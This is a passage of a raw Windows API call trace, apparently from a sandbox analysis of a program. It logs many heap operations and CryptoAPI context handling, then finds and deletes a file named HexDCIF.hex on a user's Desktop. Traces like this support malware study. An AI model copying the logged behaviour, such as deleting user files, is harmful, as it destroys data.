(HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0161.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0161.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0161.293] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0161.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0161.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.293] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0161.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0161.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0161.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0161.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0161.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0161.293] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0161.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0161.294] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0161.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0161.294] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0161.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0161.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0161.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0161.295] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0161.296] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0161.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0161.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0161.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0161.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0161.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0161.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0161.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0161.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0161.298] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0161.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0161.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0161.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0161.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0161.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0161.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0161.299] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0161.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0161.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0161.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0161.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0161.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0161.420] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.420] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0161.420] FreeLibrary (hLibModule=0x756e0000) returned 1 [0161.420] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.420] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0161.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.420] CloseHandle (hObject=0x2d0) returned 1 [0161.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.523] CloseHandle (hObject=0x2a0) returned 1 [0161.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.530] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0161.530] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0161.530] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDCIF.hex", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex", lpFilePart=0x8cedf4*="HexDCIF.hex") returned 0x23 [0161.531] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex")) returned 0x20 [0161.531] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4adbe4a, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4adbe4a, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexDCIF.hex", cAlternateFileName="")) returned 0xa87610 [0161.531] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex")) returned 1 [0161.534] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4adbe4a, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4adbe4a, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexDCIF.hex", cAlternateFileName="")) returned 0 [0161.534] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0161.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0161.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0161.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0161.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0161.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0161.535] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0161.535] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0161.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0161.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0161.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0161.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0161.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0161.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0161.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e563a8 [0161.536] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDCIF.hex", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex", lpFilePart=0x8cf650*="HexDCIF.hex") returned 0x23 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0161.536] 